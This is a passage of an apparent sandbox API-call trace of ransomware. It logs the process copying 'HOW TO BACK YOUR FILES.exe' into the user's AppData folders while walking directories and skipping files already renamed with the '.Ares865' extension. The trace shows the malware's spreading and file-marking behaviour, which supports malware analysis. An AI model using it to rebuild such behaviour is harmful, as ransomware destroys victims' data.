HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Search" [0110.827] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Search" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Search") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Search" [0110.827] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.827] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Search\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\search\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.827] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.828] GetLastError () returned 0x0 [0110.828] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0110.828] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0110.828] CloseHandle (hObject=0x120) returned 1 [0110.828] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.828] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Search\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8287550, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0x50dc4fc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50dc4fc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.828] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.828] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0110.828] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0110.829] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0110.829] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.829] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.829] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.830] GetLastError () returned 0x0 [0110.830] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0110.830] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0110.830] CloseHandle (hObject=0x120) returned 1 [0110.830] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.830] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x69dd2120, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x69dd2120, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.830] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.830] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0110.831] lstrcpyW (in: lpString1=0x2cce458, lpString2="Adobe" | out: lpString1="Adobe") returned="Adobe" [0110.831] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7968 [0110.831] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x64) returned 0x2e4710 [0110.831] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7970 | out: ListHead=0x2e7710, ListEntry=0x2e7970) returned 0x2e7950 [0110.831] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0110.831] lstrcmpiW (lpString1="Application Data", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.831] lstrcmpiW (lpString1="Application Data", lpString2="aoldtz.exe") returned 1 [0110.831] lstrcpyW (in: lpString1=0x2cce458, lpString2="Application Data" | out: lpString1="Application Data") returned="Application Data" [0110.831] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7988 [0110.831] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7a) returned 0x2f00d8 [0110.831] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7990 | out: ListHead=0x2e7710, ListEntry=0x2e7990) returned 0x2e7970 [0110.831] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f42e340, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f42e340, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Apps", cAlternateFileName="")) returned 1 [0110.831] lstrcmpiW (lpString1="Apps", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.831] lstrcmpiW (lpString1="Apps", lpString2="aoldtz.exe") returned 1 [0110.831] lstrcpyW (in: lpString1=0x2cce458, lpString2="Apps" | out: lpString1="Apps") returned="Apps" [0110.831] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79a8 [0110.831] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x62) returned 0x2e4780 [0110.831] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79b0 | out: ListHead=0x2e7710, ListEntry=0x2e79b0) returned 0x2e7990 [0110.831] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65e16800, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f4081e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f4081e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Deployment", cAlternateFileName="DEPLOY~1")) returned 1 [0110.831] lstrcmpiW (lpString1="Deployment", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.831] lstrcmpiW (lpString1="Deployment", lpString2="aoldtz.exe") returned 1 [0110.832] lstrcpyW (in: lpString1=0x2cce458, lpString2="Deployment" | out: lpString1="Deployment") returned="Deployment" [0110.832] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79c8 [0110.832] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6e) returned 0x2d2ef0 [0110.832] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79d0 | out: ListHead=0x2e7710, ListEntry=0x2e79d0) returned 0x2e79b0 [0110.832] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x66051ca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x66051ca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x69dd2120, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1ac20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GDIPFONTCACHEV1.DAT.Ares865", cAlternateFileName="GDIPFO~1.ARE")) returned 1 [0110.832] lstrcmpiW (lpString1="GDIPFONTCACHEV1.DAT.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.832] lstrcmpiW (lpString1="GDIPFONTCACHEV1.DAT.Ares865", lpString2="aoldtz.exe") returned 1 [0110.832] lstrcpyW (in: lpString1=0x2cce458, lpString2="GDIPFONTCACHEV1.DAT.Ares865" | out: lpString1="GDIPFONTCACHEV1.DAT.Ares865") returned="GDIPFONTCACHEV1.DAT.Ares865" [0110.832] lstrlenW (lpString="GDIPFONTCACHEV1.DAT.Ares865") returned 27 [0110.832] lstrlenW (lpString="Ares865") returned 7 [0110.832] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.832] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b0b7d20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4dd91240, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dd91240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Google", cAlternateFileName="")) returned 1 [0110.832] lstrcmpiW (lpString1="Google", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.832] lstrcmpiW (lpString1="Google", lpString2="aoldtz.exe") returned 1 [0110.833] lstrcpyW (in: lpString1=0x2cce458, lpString2="Google" | out: lpString1="Google") returned="Google" [0110.833] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ba8 [0110.833] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x66) returned 0x2e47f0 [0110.833] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bb0 | out: ListHead=0x2e7710, ListEntry=0x2e7bb0) returned 0x2e79d0 [0110.833] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29175f80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29175f80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29175f80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 1 [0110.833] lstrcmpiW (lpString1="History", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.833] lstrcmpiW (lpString1="History", lpString2="aoldtz.exe") returned 1 [0110.833] lstrcpyW (in: lpString1=0x2cce458, lpString2="History" | out: lpString1="History") returned="History" [0110.833] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7aa8 [0110.833] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x68) returned 0x2e4860 [0110.833] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7ab0 | out: ListHead=0x2e7710, ListEntry=0x2e7ab0) returned 0x2e7bb0 [0110.833] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4d327200, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4d327200, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0110.833] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0110.833] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x28f14980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f14980, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2b9fc540, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x126a80, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IconCache.db.Ares865", cAlternateFileName="ICONCA~1.ARE")) returned 1 [0110.833] lstrcmpiW (lpString1="IconCache.db.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0110.833] lstrcmpiW (lpString1="IconCache.db.Ares865", lpString2="aoldtz.exe") returned 1 [0110.833] lstrcpyW (in: lpString1=0x2cce458, lpString2="IconCache.db.Ares865" | out: lpString1="IconCache.db.Ares865") returned="IconCache.db.Ares865" [0110.833] lstrlenW (lpString="IconCache.db.Ares865") returned 20 [0110.833] lstrlenW (lpString="Ares865") returned 7 [0110.833] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.833] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d9d8fe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d9d8fe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0110.833] lstrcmpiW (lpString1="Microsoft", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0110.833] lstrcmpiW (lpString1="Microsoft", lpString2="aoldtz.exe") returned 1 [0110.834] lstrcpyW (in: lpString1=0x2cce458, lpString2="Microsoft" | out: lpString1="Microsoft") returned="Microsoft" [0110.834] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ac8 [0110.834] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6c) returned 0x2d2f68 [0110.834] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7ad0 | out: ListHead=0x2e7710, ListEntry=0x2e7ad0) returned 0x2e7ab0 [0110.834] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe80ff230, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0x4d9d8fe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d9d8fe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Help", cAlternateFileName="MICROS~2")) returned 1 [0110.834] lstrcmpiW (lpString1="Microsoft Help", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0110.834] lstrcmpiW (lpString1="Microsoft Help", lpString2="aoldtz.exe") returned 1 [0110.834] lstrcpyW (in: lpString1=0x2cce458, lpString2="Microsoft Help" | out: lpString1="Microsoft Help") returned="Microsoft Help" [0110.834] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ae8 [0110.834] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x76) returned 0x2c1608 [0110.834] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7af0 | out: ListHead=0x2e7710, ListEntry=0x2e7af0) returned 0x2e7ad0 [0110.834] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d6df460, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d6df460, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Mozilla", cAlternateFileName="")) returned 1 [0110.834] lstrcmpiW (lpString1="Mozilla", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0110.834] lstrcmpiW (lpString1="Mozilla", lpString2="aoldtz.exe") returned 1 [0110.834] lstrcpyW (in: lpString1=0x2cce458, lpString2="Mozilla" | out: lpString1="Mozilla") returned="Mozilla" [0110.834] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b08 [0110.834] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x68) returned 0x2e48d0 [0110.834] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b10 | out: ListHead=0x2e7710, ListEntry=0x2e7b10) returned 0x2e7af0 [0110.834] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x428d2a20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x428d2a20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0110.834] lstrcmpiW (lpString1="Temp", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0110.834] lstrcmpiW (lpString1="Temp", lpString2="aoldtz.exe") returned 1 [0110.835] lstrcpyW (in: lpString1=0x2cce458, lpString2="Temporary Internet Files" | out: lpString1="Temporary Internet Files") returned="Temporary Internet Files" [0110.835] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b48 [0110.835] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8a) returned 0x320fc8 [0110.835] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b50 | out: ListHead=0x2e7710, ListEntry=0x2e7b50) returned 0x2e7b10 [0110.835] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2ab32d60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d457d00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d457d00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VirtualStore", cAlternateFileName="VIRTUA~1")) returned 1 [0110.835] lstrcmpiW (lpString1="VirtualStore", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0110.835] lstrcmpiW (lpString1="VirtualStore", lpString2="aoldtz.exe") returned 1 [0110.835] lstrcpyW (in: lpString1=0x2cce458, lpString2="VirtualStore" | out: lpString1="VirtualStore") returned="VirtualStore" [0110.835] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b68 [0110.835] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x72) returned 0x2c1408 [0110.835] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b70 | out: ListHead=0x2e7710, ListEntry=0x2e7b70) returned 0x2e7b50 [0110.835] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2ab32d60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d457d00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d457d00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VirtualStore", cAlternateFileName="VIRTUA~1")) returned 0 [0110.835] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0110.835] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b70 [0110.835] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\VirtualStore", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\VirtualStore") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\VirtualStore" [0110.836] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\VirtualStore" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\VirtualStore") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\VirtualStore" [0110.836] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.836] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\VirtualStore\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\virtualstore\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.836] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.837] GetLastError () returned 0x0 [0110.837] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0110.837] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0110.837] CloseHandle (hObject=0x120) returned 1 [0110.837] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.837] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\VirtualStore\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2ab32d60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d457d00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d457d00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.837] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.837] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0110.837] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files" [0110.838] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files" [0110.838] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.838] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temporary internet files\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.838] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.839] GetLastError () returned 0x0 [0110.839] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 